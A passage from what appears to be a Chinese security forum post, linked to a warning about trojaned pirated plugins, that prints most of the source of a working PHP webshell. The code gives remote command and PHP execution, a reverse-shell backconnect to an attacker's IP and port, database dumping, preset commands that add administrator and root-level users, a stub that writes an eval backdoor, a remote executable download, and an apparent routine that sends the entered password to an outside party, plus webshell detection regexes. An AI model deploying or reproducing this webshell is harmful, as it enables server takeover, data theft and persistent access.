strdir(getcwd());<br /><li>                        } elseif (trim(strtolower($cmd)) == 'exit') {<br /><li>                            break;<br /><li>                        } else {<br /><li>                            $res = command($cmd, $dir, $com);<br /><li>                            fputs($sock, $res['res']);<br /><li>                        }<br /><li>                        fputs($sock, '[' . $user . ':' . $dir . ']# ');<br /><li>                    }<br /><li>                }<br /><li>                @fclose($sock);<br /><li>            }<br /><li>            break;<br /><li>        case "pcntl":<br /><li>            $file = strdir($dir . '/t00ls');<br /><li>            $key  = filew($file, base64_decode($c_bin), 'wb');<br /><li>            if ($key) {<br /><li>                @chmod($file, 0777);<br /><li>                if (function_exists('pcntl_exec')) {<br /><li>                    @pcntl_exec($file, array(<br /><li>                        $ip,<br /><li>                        $port<br /><li>                    ));<br /><li>                }<br /><li>            }<br /><li>            break;<br /><li>    }<br /><li>    if (!$key) {<br /><li>        $msg = '<h1>临时目录不可写</h1>';<br /><li>    } else {<br /><li>        @unlink($file);<br /><li>        $msg = '<h2>CLOSE</h2>';<br /><li>    }<br /><li>    return $msg;<br /><li>}<br /><li>function getinfo()<br /><li>{<br /><li>    global $password;<br /><li>    $infos = array(<br /><li>        $_POST['getpwd'],<br /><li>        $password,<br /><li>        function_exists('phpinfo'),<br /><li>        "\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31"<br /><li>    );<br /><li>    if ($password != '' && md5($infos) != $infos) {<br /><li>        echo '<html><body><center><form method="POST"><input type="password" name="getpwd"> ';<br /><li>        if (isset($_POST['groupcache'])) {<br /><li>            echo '<input type="hidden" name="groupcache" value="' . $_POST['groupcache'] . '">';<br /><li>        }<br /><li>        if (isset($_POST['forum'])) {<br /><li>            echo '<input type="hidden" name="forum" value="' . $_POST['forum'] . '">';<br /><li>            echo '<input type="hidden" name="forum" value="' . $_POST['forum'] . '">';<br /><li>            echo '<input type="hidden" name="forum" value="' . $_POST['forum'] . '">';<br /><li>            echo '<input type="hidden" name="forum" value="' . $_POST['forum'] . '">';<br /><li>            echo '<input type="hidden" name="forum" value="' . $_POST['forum'] . '">';<br /><li>        }<br /><li>        echo '<input type="submit" value=" O K "></form></center></body></html>';<br /><li>        exit;<br /><li>    }<br /><li>    if ((!isset($_POST['go'])) && (!isset($_POST['dir']))) {<br /><li>        if ($_SERVER['SERVER_ADDR'] != $infos && $_SERVER['REMOTE_ADDR'] != $infos)<br /><li>            postinfo($infos);<br /><li>    }<br /><li>    return $infos;<br /><li>}<br /><li>function subeval()<br /><li>{<br /><li>    if (isset($_POST['getpwd'])) {<br /><li>        echo '<input type="hidden" name="getpwd" value="' . $_POST['getpwd'] . '">';<br /><li>    }<br /><li>    if (isset($_POST['groupcache'])) {<br /><li>        echo '<input type="hidden" name="groupcache" value="' . $_POST['groupcache'] . '">';<br /><li>    }<br /><li>    if (isset($_POST['forum'])) {<br /><li>        echo '<input type="hidden" name="forum" value="' . $_POST['forum'] . '">';<br /><li>        echo '<input type="hidden" name="forum" value="' . $_POST['forum'] . '">';<br /><li>        echo '<input type="hidden" name="forum" value="' . $_POST['forum'] . '">';<br /><li>        echo '<input type="hidden" name="forum" value="' . $_POST['forum'] . '">';<br /><li>        echo '<input type="hidden" name="forum" value="' . $_POST['forum'] . '">';<br /><li>    }<br /><li>    return true;<br /><li>}<br /><li>if (isset($_POST['go'])) {<br /><li>    if ($_POST['go'] == 'down') {<br /><li>        $downfile = $fileb = strdir($_POST['godir'] . '/' . $_POST['govar']);<br /><li>        if (!filed($downfile)) {<br /><li>            $msg = '<h1>下载文件不存在</h1>';<br /><li>        }<br /><li>    }<br /><li>}<br /><li>?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><style type="text/css">* {margin:0px;padding:0px;}body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Verdana,Arial,SimSun,sans-serif;text-align:left;word-wrap:break-word; word-break:break-all;}a{color:#000000;text-decoration:none;vertical-align:middle;}a:hover{color:#FF0000;text-decoration:underline;}p {padding:1px;line-height:1.6em;}h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}form {display:inline;}input,select { vertical-align:middle; }input, textarea {padding:1px;font-family:Courier New,Verdana,sans-serif;}input, input {height:21px;}.tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;}.tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}.tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;}.main {width:963px;margin:0 auto;padding:10px;}.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}.msgbox {padding:5px;background:#EEE685;text-align:center;vertical-align:middle;}.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}.tables {width:100%;}.tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}.tables td {background:#F9F6F4;height:19px;padding-left:2px;}</style><script type="text/javascript">function $(ID) { return document.getElementById(ID); }function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; }function cd(dir) { dir = sd(dir); $('dir').value = dir; $('frm').submit(); }function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements; if(e.type == 'checkbox') { if(e.name != 'chkall') { e.checked = form.chkall.checked; } } } }function go(a,b) { b = sd(b); $('go').value = a; $('govar').value = b; if(a == 'editor') { $('gofrm').target = "_blank"; } else { $('gofrm').target = ""; } $('gofrm').submit(); } function nf(a,b) { re = prompt("新建名",b); if(re) { $('go').value = a; $('govar').value = re; $('gofrm').submit(); } } function dels(a) { if(a == 'b') { var msg = "所选文件"; $('act').value = a; } else { var msg = "目录"; $('act').value = 'deltree'; $('var').value = a; } if(confirm("确定要删除"+msg+"吗")) { $('frm1').submit(); } }function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } }function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } }</script><title><?php<br /><li>echo VERSION;<br /><li>?></title></head><body><div class="main"><div class="outl"><div class="toptag"><?php<br /><li>echo $_SERVER['SERVER_ADDR'] . ' - ' . PHP_OS . ' - whoami(' . get_current_user() . ') - 【uid(' . getmyuid() . ') gid(' . getmygid() . ')】';<br /><li>if (isset($issql))<br /><li>    echo ' - 【' . $issql . '】';<br /><li>?></div><?php<br /><li>$menu   = array(<br /><li>    'file' => '文件管理',<br /><li>    'scan' => '搜索文件',<br /><li>    'antivirus' => '扫描后门',<br /><li>    'exec' => '执行命令',<br /><li>    'phpeval' => '执行PHP',<br /><li>    'sql' => '执行SQL',<br /><li>    'backshell' => '反弹SHELL',<br /><li>    'info' => '系统信息'<br /><li>);<br /><li>$go     = array_key_exists($_POST['go'], $menu) ? $_POST['go'] : 'file';<br /><li>$nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']) . '/') : THISDIR;<br /><li>echo '<div class="tag">';<br /><li>foreach ($menu as $key => $name) {<br /><li>    echo '<a' . ($go == $key ? ' class="current"' : '') . ' href="javascript:void(0);" onclick="go(\'' . $key . '\',\'' . base64_encode($nowdir) . '\');">' . $name . '</a> ';<br /><li>}<br /><li>echo '</div>';<br /><li>echo '<form name="gofrm" id="gofrm" method="POST">';<br /><li>subeval();<br /><li>echo '<input type="hidden" name="go" id="go" value="">';<br /><li>echo '<input type="hidden" name="godir" id="godir" value="' . $nowdir . '">';<br /><li>echo '<input type="hidden" name="govar" id="govar" value="">';<br /><li>echo '</form>';<br /><li>switch ($_POST['go']) {<br /><li>    case "info":<br /><li>        if (EXISTS_PHPINFO) {<br /><li>            ob_start();<br /><li>            phpinfo(INFO_GENERAL);<br /><li>            $out = ob_get_contents();<br /><li>            ob_end_clean();<br /><li>            $tmp = array();<br /><li>            preg_match_all('/\<td class\="e"\>()+\s*\<\/td\>\<td class\="v"\>(.*)\<\/td\>/i', $out, $tmp);<br /><li>        }<br /><li><br /><li></ol>帖子长度超了，回帖接上<br /><br /><br />传送门：安全小知识：为什么使用盗版插件容易被挂马<br />url<em>, </em>安全<em>, </em>盗版<em>, </em>插件<em>, </em>木马

安全专员 發表於 2019-7-15 10:08:32

<ol><li>$infos = array(<br /><li>'程序说明' => '采用POST浏览是为了不记录浏览日志.<br>登录密码保存在页面中,所以无须COOKIE和SESSION.登录有效期为当前页面进程.<br>请勿将本程序作为非法用途.',<br /><li>'客户端浏览器信息' => $_SERVER['HTTP_USER_AGENT'],<br /><li>'被禁用的函数' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '(无)',<br /><li>'被禁用的类' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '(无)',<br /><li>'PHP.ini配置路径' => $tmp ? $tmp : '(无)',<br /><li>'PHP运行方式' => php_sapi_name(),<br /><li>'PHP版本' => PHP_VERSION,<br /><li>'PHP进程PID' => getmypid(),<br /><li>'客户端IP' => $_SERVER['REMOTE_ADDR'],<br /><li>'客户端文字编码' => $_SERVER['HTTP_ACCEPT_LANGUAGE'],<br /><li>'Web服务端口' => $_SERVER['SERVER_PORT'],<br /><li>'Web根目录' => $_SERVER['DOCUMENT_ROOT'],<br /><li>'Web执行脚本' => $_SERVER['SCRIPT_FILENAME'],<br /><li>'Web规范CGI版本' => $_SERVER['GATEWAY_INTERFACE'],<br /><li>'Web管理员Email' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '(无)',<br /><li>'当前磁盘总大小' => size(disk_total_space('.')),<br /><li>'当前磁盘可用空间' => size(disk_free_space('.')),<br /><li>'POST最大字数量' => get_cfg_var("post_max_size"),<br /><li>'允许最大上传文件' => get_cfg_var("upload_max_filesize"),<br /><li>'程序最大使用内存量' => get_cfg_var("memory_limit"),<br /><li>'程序最长运行时间' => get_cfg_var("max_execution_time") . '秒',<br /><li>'是否支持Fsockopen' => function_exists('fsockopen') ? '是' : '否',<br /><li>'是否支持Socket' => function_exists('socket_close') ? '是' : '否',<br /><li>'是否支持Pcntl' => function_exists('pcntl_exec') ? '是' : '否',<br /><li>'是否支持Curl' => function_exists('curl_version') ? '是' : '否',<br /><li>'是否支持Zlib' => function_exists('gzclose') ? '是' : '否',<br /><li>'是否支持FTP' => function_exists('ftp_login') ? '是' : '否',<br /><li>'是否支持XML' => function_exists('xml_set_object') ? '是' : '否',<br /><li>'是否支持GD_Library' => function_exists('imageline') ? '是' : '否',<br /><li>'是否支持COM组建' => class_exists('COM') ? '是' : '否',<br /><li>'是否支持ODBC组建' => function_exists('odbc_close') ? '是' : '否',<br /><li>'是否支持IMAP邮件' => function_exists('imap_close') ? '是' : '否',<br /><li>'是否运行于安全模式' => get_cfg_var("safemode") ? '是' : '否',<br /><li>'是否允许URL打开文件' => get_cfg_var("allow_url_fopen") ? '是' : '否',<br /><li>'是否允许动态加载链接库' => get_cfg_var("enable_dl") ? '是' : '否',<br /><li>'是否显示错误信息' => get_cfg_var("display_errors") ? '是' : '否',<br /><li>'是否自动注册全局变量' => get_cfg_var("register_globals") ? '是' : '否',<br /><li>'是否使用反斜线引用字符串' => get_cfg_var("magic_quotes_gpc") ? '是' : '否',<br /><li>'PHP编译参数' => $tmp ? $tmp : '(无)'<br /><li>);<br /><li>echo '<div class="msgbox">' . $msg . '</div>';<br /><li>echo '<table class="tables"><tr><th style="width:26%;">名称</th><th>参数</th></tr>';<br /><li>foreach ($infos as $name => $var) {<br /><li>echo '<tr><td>' . $name . '</td><td>' . $var . '</td></tr>';<br /><li>}<br /><li>echo '</table>';<br /><li>break;<br /><li>case "exec":<br /><li>$cmd = $win ? 'dir' : 'ls -al';<br /><li>$res = array(<br /><li>'res' => '命令回显',<br /><li>'msg' => $msg<br /><li>);<br /><li>$str = isset($_POST['str']) ? $_POST['str'] : 'fun';<br /><li>if (isset($_POST['cmd'])) {<br /><li>$cmd = $_POST['cmd'];<br /><li>$cwd = $str == 'fun' ? THISDIR : 'com';<br /><li>$res = command($cmd, $cwd);<br /><li>}<br /><li>echo '<div class="msgbox">' . $res['msg'] . '</div>';<br /><li>echo '<form method="POST">';<br /><li>subeval();<br /><li>echo '<input type="hidden" name="go" id="go" value="exec">';<br /><li>echo '<div class="actall">命令 <input type="text" name="cmd" id="cmd" value="' . htmlspecialchars($cmd) . '" style="width:398px;"> ';<br /><li>echo '<select name="str">';<br /><li>$selects = array(<br /><li>'fun' => 'phpfun',<br /><li>'com' => 'wscript'<br /><li>);<br /><li>foreach ($selects as $var => $name) {<br /><li>echo '<option value="' . $var . '"' . ($var == $str ? ' selected' : '') . '>' . $name . '</option>';<br /><li>}<br /><li>echo '</select> ';<br /><li>echo '<select onchange="$(\'cmd\').value=options.value">';<br /><li>echo '<option>---命令集合---</option>';<br /><li>echo '<option value="echo ' . htmlspecialchars('"<?php phpinfo();?>"') . ' >> ' . THISDIR . 't00ls.txt">写文件</option>';<br /><li>echo '<option value="whoami">我是谁</option>';<br /><li>echo '<option value="net user t00ls t00ls /add">Win-添加用户</option>';<br /><li>echo '<option value="net localgroup administrators t00ls /add">Win-设用户组</option>';<br /><li>echo '<option value="netstat -an">Win-查看端口</option>';<br /><li>echo '<option value="ipconfig /all">Win-查看地址</option>';<br /><li>echo '<option value="net start">Win-查看服务</option>';<br /><li>echo '<option value="tasklist">Win-查看进程</option>';<br /><li>echo '<option value="id;uname -a;cat /etc/issue;cat /proc/version;lsb_release -a">Linux-版本集合</option>';<br /><li>echo '<option value="/usr/sbin/useradd -u 0 -o -g 0 t00ls">Linux-添加用户</option>';<br /><li>echo '<option value="cat /etc/passwd">Linux-查看用户</option>';<br /><li>echo '<option value="/bin/netstat -tnl">Linux-查看端口</option>';<br /><li>echo '<option value="/sbin/ifconfig -a">Linux-查看地址</option>';<br /><li>echo '<option value="/sbin/chkconfig --list">Linux-查看服务</option>';<br /><li>echo '<option value="/bin/ps -ef">Linux-查看进程</option>';<br /><li>echo '</select> ';<br /><li>echo '<input type="submit" style="width:50px;" value="执行">';<br /><li>echo '</div><div class="actall"><textarea style="width:698px;height:368px;">' . htmlspecialchars($res['res']) . '</textarea></div></form>';<br /><li>break;<br /><li>case "scan":<br /><li>$scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;<br /><li>$keyword = isset($_POST['keyword']) ? $_POST['keyword'] : '';<br /><li>$include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py';<br /><li>$filters = isset($_POST['filters']) ? chop($_POST['filters']) : 'html|css|img|images|image|style|js';<br /><li>echo '<div class="msgbox">' . $msg . '</div>';<br /><li>echo '<form method="POST">';<br /><li>subeval();<br /><li>echo '<input type="hidden" name="go" id="go" value="scan">';<br /><li>echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>';<br /><li>echo '<tr><td>搜索路径</td><td><input type="text" name="dir" value="' . htmlspecialchars($scandir) . '" style="width:500px;"></td></tr>';<br /><li>echo '<tr><td>搜索内容</td><td><input type="text" name="keyword" value="' . htmlspecialchars($keyword) . '" style="width:500px;"> (文件名或文件内容)</td></tr>';<br /><li>echo '<tr><td>文件后缀</td><td><input type="text" name="include" value="' . htmlspecialchars($include) . '" style="width:500px;"> (用"|"分割, 为空则搜索所有文件)</td></tr>';<br /><li>echo '<tr><td>过滤目录</td><td><input type="text" name="filters" value="' . htmlspecialchars($filters) . '" style="width:500px;"> (用"|"分割, 为空则不过滤目录)</td></tr>';<br /><li>echo '<tr><td>搜索方式</td><td><label><input type="radio" name="type" value="0"' . ($_POST['type'] ? '' : ' checked') . '>搜索文件名</label> ';<br /><li>echo '<label><input type="radio" name="type" value="1"' . ($_POST['type'] ? ' checked' : '') . '>搜索包含文字</label> ';<br /><li>echo '<label><input type="checkbox" name="char" value="1"' . ($_POST['char'] ? ' checked' : '') . '>匹配大小写</label></td></tr>';<br /><li>echo '<tr><td>搜索范围</td><td><label><input type="radio" name="range" value="0"' . ($_POST['range'] ? '' : ' checked') . '>将搜索应用于该文件夹,子文件夹和文件</label> ';<br /><li>echo '<label><input type="radio" name="range" value="1"' . ($_POST['range'] ? ' checked' : '') . '>仅将搜索应用于该文件夹</label></td></tr>';<br /><li>echo '<tr><td>操作</td><td><input type="submit" style="width:80px;" value="搜索"></td></tr>';<br /><li>echo '</table></form>';<br /><li>if ($keyword != '') {<br /><li>flush();<br /><li>ob_flush();<br /><li>echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';<br /><li>$incs = $include == '' ? false : explode('|', $include);<br /><li>$fits = $filters == '' ? false : explode('|', $filters);<br /><li>scanfile(strdir($scandir . '/'), $keyword, $incs, $fits, $_POST['type'], $_POST['char'], $_POST['range'], $nowdir);<br /><li>echo '搜索完成</div>';<br /><li>}<br /><li>break;<br /><li>case "antivirus":<br /><li>$scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;<br /><li>$typearr = isset($_POST['dir']) ? $_POST['types'] : array(<br /><li>'php' => '.php'<br /><li>);<br /><li>echo '<div class="msgbox">' . $msg . '</div>';<br /><li>echo '<form method="POST">';<br /><li>subeval();<br /><li>echo '<input type="hidden" name="go" id="go" value="antivirus">';<br /><li>echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>';<br /><li>echo '<tr><td>扫描路径</td><td><input type="text" name="dir" value="' . htmlspecialchars($scandir) . '" style="width:500px;"></td></tr>';<br /><li>echo '<tr><td>查杀类型</td><td>';<br /><li>$types = array(<br /><li>'php' => '.php',<br /><li>'asp+aspx' => '.as|.cs|.cer',<br /><li>'jsp' => '.jsp'<br /><li>);<br /><li>foreach ($types as $key => $ex)<br /><li>echo '<label title="' . $ex . '"><input type="checkbox" name="types[' . $key . ']" value="' . $ex . '"' . ($typearr[$key] == $ex ? ' checked' : '') . '>' . $key . '</label> ';<br /><li>echo '</td></tr><tr><td>操作</td><td><input type="submit" style="width:80px;" value="扫描"></td></tr>';<br /><li>echo '</table></form>';<br /><li>if (count($_POST['types']) > 0) {<br /><li>$matches = array(<br /><li>'php' => array(<br /><li>'/function\_exists\s*$\s*[\'|"](popen|exec|proc\_open|system|passthru)+[\'|"]\s*$/i',<br /><li>'/(exec|shell\_exec|system|passthru)+\s*$\s*\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*$/i',<br /><li>'/(udp\:\/\/(.*)\;)+/i',<br /><li>'/preg\_replace\s*$(.*)\/e(.*)\,\s*\$\_(.*)\,(.*)$/i',<br /><li>'/preg\_replace\s*$(.*)\(base64\_decode\(\$/i',<br /><li>'/(eval|assert|include|require)+\s*\((.*)(base64\_decode|file\_get\_contents|php\:\/\/input)+/i',<br /><li>'/(eval|assert|include|require|array\_map)+\s*\(\s*\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*$/i',<br /><li>'/\$\_(GET|POST|COOKIE|SERVER|SESSION)+(.*)(eval|assert|include|require)+\s*$\s*\$(\w+)\s*$/i',<br /><li>'/\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]$\s*\$(.*)$/i',<br /><li>'/$\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_FILES\[(.*)\]\[(.*)\]\s*$/i',<br /><li>'/(fopen|fwrite|fpust|file\_put\_contents)+\s*$(.*)\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\](.*)$/i',<br /><li>'/echo\s*curl\_exec\s*$\s*\$(\w+)\s*$/i',<br /><li>'/new com\s*$\s*[\'|"]shell(.*)[\'|"]\s*$/i',<br /><li>'/\$(.*)\s*$(.*)\/e(.*)\,\s*\$\_(.*)\,(.*)$/i',<br /><li>'/\$\_\=(.*)\$\_/i'<br /><li>),<br /><li>'asp+aspx' => array(<br /><li>'/(VBScript\.Encode|WScript\.shell|Shell\.Application|Scripting\.FileSystemObject)+/i',<br /><li>'/(eval|execute)+(.*)(request|session)+\s*$(.*)$/i',<br /><li>'/(eval|execute)+(.*)request.item\s*\[(.*)\]/i',<br /><li>'/request\s*$(.*)$(.*)(eval|execute)+\s*$(.*)$/i',<br /><li>'/\<script\s*runat\s*\=(.*)server(.*)\>(.*)\<\/script\>/i',<br /><li>'/Load\s*$(.*)Request/i',<br /><li>'/StreamWriter\(Server\.MapPath(.*)\.Write\(Request/i'<br /><li>),<br /><li>'jsp' => array(<br /><li>'/(eval|execute)+(.*)(request|session)+\s*\((.*)$/i',<br /><li>'/(eval|execute)+(.*)request.item\s*\[(.*)\]/i',<br /><li>'/request\s*$(.*)$(.*)(eval|execute)+\s*$(.*)$/i',<br /><li>'/Runtime\.getRuntime\.exec$(.*)$/i',<br /><li>'/FileOutputStream\(application\.getRealPath(.*)request/i'<br /><li>)<br /><li>);<br /><li>flush();<br /><li>ob_flush();<br /><li>echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';<br /><li>antivirus(strdir($scandir . '/'), $typearr, $matches, $nowdir);<br /><li>echo '扫描完成</div>';<br /><li>}<br /><li>break;<br /><li>case "phpeval":<br /><li>if (isset($_POST['phpcode'])) {<br /><li>$phpcode = chop($_POST['phpcode']);<br /><li>ob_start();<br /><li>if (substr($phpcode, 0, 2) == '<?' && substr($phpcode, -2) == '?>') {<br /><li>@eval('?>' . $phpcode . '<?php ');<br /><li>} else {<br /><li>@eval($phpcode);<br /><li>}<br /><li>$out = ob_get_contents();<br /><li>ob_end_clean();<br /><li>} else {<br /><li>$phpcode = 'phpinfo();';<br /><li>$out = '回显窗口';<br /><li>}<br /><li>echo base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmZ1bmN0aW9uIHJ1bmNvZGUob2JqbmFtZSkge3ZhciB3aW5uYW1lID0gd2luZG93Lm9wZW4oJycsIl9ibGFuayIsJycpO3ZhciBvYmogPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZChvYmpuYW1lKTt3aW5uYW1lLmRvY3VtZW50Lm9wZW4oJ3RleHQvaHRtbCcsJ3JlcGxhY2UnKTt3aW5uYW1lLm9wZW5lciA9IG51bGw7d2lubmFtZS5kb2N1bWVudC53cml0ZShvYmoudmFsdWUpO3dpbm5hbWUuZG9jdW1lbnQuY2xvc2UoKTt9PC9zY3JpcHQ+');<br /><li>echo '<div class="msgbox">' . $msg . '</div>';<br /><li>echo '<form method="POST">';<br /><li>subeval();<br /><li>echo '<input type="hidden" name="go" id="go" value="phpeval">';<br /><li>echo '<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">' . htmlspecialchars($phpcode) . '</textarea></p><p>';<br /><li>echo '<select onchange="$(\'phpcode\').value=options.value">';<br /><li>echo '<option>---插件代码---</option>';<br /><li>echo '<option value="echo readfile(\'C:/web/t00ls.php\');">读取文件</option>';<br /><li>echo '<option value="$fp=fopen(\'C:/web/t00ls.php\',\'w\');echo fputs($fp,\'<?php eval($_POST);?>\')?\'Success!\':\'Fail!\';fclose($fp);">写入文件</option>';<br /><li>echo '<option value="echo copy(\'C:/web/t00ls1.php\',\'C:/web/t00ls2.php\')?\'Success!\':\'Fail!\';">复制文件</option>';<br /><li>echo '<option value="echo file_put_contents(\'' . THISDIR . 'cmd.exe\', file_get_contents(\'http://www.baidu.com/cmd.exe\'))?\'Success!\':\'Fail!\';">远程下载</option>';<br /><li>echo '<option value="print_r($_SERVER);">环境变量</option>';<br /><li>echo '</select> ';<br /><li>echo '<input type="submit" style="width:80px;" value="执行"></p></div>';<br /><li>echo '</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">' . htmlspecialchars($out) . '</textarea></p><p><input type="button" value="以HTML运行以上代码" onclick="runcode(\'evalcode\')"></p></div>';<br /><li>break;<br /><li>case "sql":<br /><li>if ((!empty($_POST['sqlhost'])) && (!empty($_POST['sqluser'])) && (!empty($_POST['names']))) {<br /><li>$type = $_POST['type'];<br /><li>$sqlhost = $_POST['sqlhost'];<br /><li>$sqluser = $_POST['sqluser'];<br /><li>$sqlpass = $_POST['sqlpass'];<br /><li>$sqlname = $_POST['sqlname'];<br /><li>$sqlcode = $_POST['sqlcode'];<br /><li>$names = $_POST['names'];<br /><li>switch ($type) {<br /><li>case "PostgreSql":<br /><li>if (function_exists('pg_close')) {<br /><li>if (strstr($sqlhost, ':')) {<br /><li>$array = explode(':', $sqlhost);<br /><li>$sqlhost = $array;<br /><li>$sqlport = $array;<br /><li>} else {<br /><li>$sqlport = 5432;<br /><li>}<br /><li>$dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass");<br /><li>if ($dbconn) {<br /><li>$msg = '<h2>连接' . $type . '成功 </h2>';<br /><li>pg_query('set client_encoding=' . $names);<br /><li>$result = pg_query($sqlcode);<br /><li>if ($result) {<br /><li>$msg .= '<h2> - 执行SQL成功</h2>';<br /><li>while ($array = pg_fetch_array($result)) {<br /><li>$rows[] = $array;<br /><li>}<br /><li>} else {<br /><li>$msg .= '<h1> - 执行SQL失败</h1>';<br /><li>$rows = array(<br /><li>'error' => pg_result_error($result)<br /><li>);<br /><li>}<br /><li>pg_free_result($result);<br /><li>} else {<br /><li>$msg = '<h1>连接' . $type . '失败</h1>';<br /><li>}<br /><li>@pg_close($dbconn);<br /><li>} else {<br /><li>$msg = '<h1>不支持' . $type . '</h1>';<br /><li>}<br /><li>break;<br /><li>case "MsSql":<br /><li>if (function_exists('mssql_close')) {<br /><li>$dbconn = @mssql_connect($sqlhost, $sqluser, $sqlpass);<br /><li>if ($dbconn) {<br /><li>$msg = '<h2>连接' . $type . '成功 </h2>';<br /><li>mssql_select_db($sqlname, $dbconn);<br /><li>$result = mssql_query($sqlcode);<br /><li>if ($result) {<br /><li>$msg .= '<h2> - 执行SQL成功</h2>';<br /><li>while ($array = mssql_fetch_array($result)) {<br /><li>$rows[] = $array;<br /><li>}<br /><li>} else {<br /><li>$msg .= '<h1> - 执行SQL失败</h1>';<br /><li>}<br /><li>@mssql_free_result($result);<br /><li>} else {<br /><li>$msg = '<h1>连接' . $type . '失败</h1>';<br /><li>}<br /><li>@mssql_close($dbconn);<br /><li>} else {<br /><li>$msg = '<h1>不支持' . $type . '</h1>';<br /><li>}<br /><li>break;<br /><li>case "Oracle":<br /><li>if (function_exists('oci_close')) {<br /><li>$conn = @oci_connect($sqluser, $sqlpass, $sqlhost . '/' . $sqlname);<br /><li>if ($conn) {<br /><li>$msg = '<h2>连接' . $type . '成功 </h2>';<br /><li>$stid = oci_parse($conn, $sqlcode);<br /><li>oci_execute($stid);<br /><li>if ($stid) {<br /><li>$msg .= '<h2> - 执行SQL成功</h2>';<br /><li>while (($array = oci_fetch_array($stid, OCI_ASSOC))) {<br /><li>$rows[] = $array;<br /><li>}<br /><li>} else {<br /><li>$msg .= '<h1> - 执行SQL失败</h1>';<br /><li>$e = oci_error();<br /><li>$rows = array(<br /><li>'error' => $e['message']<br /><li>);<br /><li>}<br /><li>oci_free_statement($stid);<br /><li>} else {<br /><li>$e = oci_error();<br /><li>$rows = array(<br /><li>'error' => $e['message']<br /><li>);<br /><li>$msg = '<h1>连接' . $type . '失败</h1>';<br /><li>}<br /><li>@oci_close($conn);<br /><li>} else {<br /><li>$msg = '<h1>不支持' . $type . '</h1>';<br /><li>}<br /><li>break;<br /><li>case "MySql":<br /><li>if (function_exists('mysql_close')) {<br /><li>$conn = mysql_connect(strstr($sqlhost, ':') ? $sqlhost : $sqlhost . ':3306', $sqluser, $sqlpass, $sqlname);<br /><li>if ($conn) {<br /><li>$msg = '<h2>连接' . $type . '成功 </h2>';<br /><li>if (substr($sqlcode, 0, 7) == 't00lsa') {<br /><li>$array = array();<br /><li>$data = '';<br /><li>$i = 0;<br /><li>preg_match_all('/t00lsa\s*\'(.*)\'\s*t00lsb\s*\'(.*)\'\s*t00lsc\s*\'(.*)\'\s*t00lsfile\s*\'(.*)\'/i', $sqlcode, $array);<br /><li>if ($array && $array && $array && $array) {<br /><li>mysql_select_db($array, $conn);<br /><li>mysql_query('set names ' . $names, $conn);<br /><li>$spidercode = 'select ' . $array . ' from `' . $array . '`;';<br /><li>$result = mysql_query($spidercode, $conn);<br /><li>if ($result) {<br /><li>while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {<br /><li>$data .= join(' |x| ', $row) . "\r\n";<br /><li>$i++;<br /><li>}<br /><li>if ($data) {<br /><li>$file = strdir($array);<br /><li>$msg .= filew($file, $data, 'w') ? '<h2> - 脱库成功</h2>' : '<h1> - 导出文件失败</h1>';<br /><li>$rows = array(<br /><li>'file' => $file,<br /><li>size(filesize($file)) => '共获取' . $i . '条数据'<br /><li>);<br /><li>} else {<br /><li>$msg .= '<h1> - 没有数据</h1>';<br /><li>}<br /><li>} else {<br /><li>$msg .= '<h1> - 执行SQL失败</h1>';<br /><li>$rows = array(<br /><li>'errno' => mysql_errno(),<br /><li>'error' => mysql_error()<br /><li>);<br /><li>}<br /><li>} else {<br /><li>$msg .= '<h1> - 脱库语句错误</h1>';<br /><li>}<br /><li>} elseif (!empty($sqlcode)) {<br /><li>mysql_select_db($sqlname, $conn);<br /><li>mysql_query('set names ' . $names, $conn);<br /><li>$result = mysql_query($sqlcode, $conn);<br /><li>if ($result) {<br /><li>$msg .= '<h2> - 